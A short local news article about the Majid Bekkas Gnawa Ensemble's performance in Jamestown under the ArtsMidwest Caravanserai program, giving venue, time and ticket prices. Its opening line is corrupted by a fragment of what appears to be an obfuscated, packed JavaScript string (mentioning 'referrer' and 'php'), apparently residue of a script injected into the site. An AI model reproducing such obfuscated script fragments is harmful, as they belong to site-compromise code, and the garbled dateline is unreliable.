JAMESTOWN rkihf|var|u0026u|referrer|hefsk||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – As one of only four cities nationwide to be selected, Jamestown will host its first public performance for a critically-acclaimed Moroccan musical group tonight through the ArtsMidwest Caravanserai program.

The Majid Bekkas Gnawa Ensemble, which has spent time in the area all this week, will perform at the Jamestown High School auditorium at 7:30 p.m.

Jamestown joins Nashville, Tenn., Grand Rapids, Minn., and Fayetteville, Ark., as the only locations in the U.S. to be selected for the ArtsMidwest Caravanserai program. The program is a cultural exchange program designed to showcase diverse art and culture of contemporary Islamic societies.

The six-person Moroccan musical group plays traditional Moroccan instruments, sings and dances. Tonight’s performance will also feature musician Brahim Frigbane.

“It’s a unique opportunity for this community to experience the culture, history and music of Morocco,” said Taylor Barnes, director of Jamestown Arts Center.

Tickets for the performance are available at the door or at the Arts Center for $7 for Arts Center members and $10 for others. There is no admission cost for students.
